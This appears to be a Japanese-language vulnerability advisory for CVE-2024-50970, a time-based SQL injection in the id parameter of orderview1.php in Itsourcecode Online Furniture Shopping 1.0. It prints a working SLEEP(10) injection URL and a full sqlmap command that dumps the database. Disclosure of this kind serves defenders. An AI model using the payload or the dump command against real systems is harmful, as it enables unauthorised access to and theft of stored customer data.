CVE-2024-50970
説明
Itsourcecode Online Furniture Shopping Project 1.0 の orderview1.php における SQL インジェクションの脆弱性により、リモート攻撃者が id パラメータを介して任意の SQL コマンドを実行できます。
脆弱性タイプ
SQL インジェクション
製品ベンダー
Itsourcecode
影響を受ける製品コードベース:
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0
影響を受けるコンポーネント:
Itsourcecode Online Furniture Shopping v1.0 は、orderview1.php ページの id パラメータを介して SQL インジェクションに対して脆弱です。
攻撃ベクトル:
- アプリケーションをローカルにセットアップし、アカウントを登録し、新しく登録したアカウントでログインします。
- ブラウザで次の URL にアクセスします:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
- SQL ペイロードを注入:
URL の id パラメータを変更し、時間ベースの SQL インジェクションペイロードを含めます。
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
- アプリケーションの応答を確認:
インジェクションが成功した場合、ページの読み込みに著しい遅延(10秒)が発生します。これにより、id パラメータが SQL インジェクションに対して脆弱であることが確認できます。
- ここで SQLMap ツールを使用してさらに悪用し、以下のコマンドでデータベースをダンプします:
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
参考:
- https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
- https://owasp.org/www-community/attacks/SQL_Injection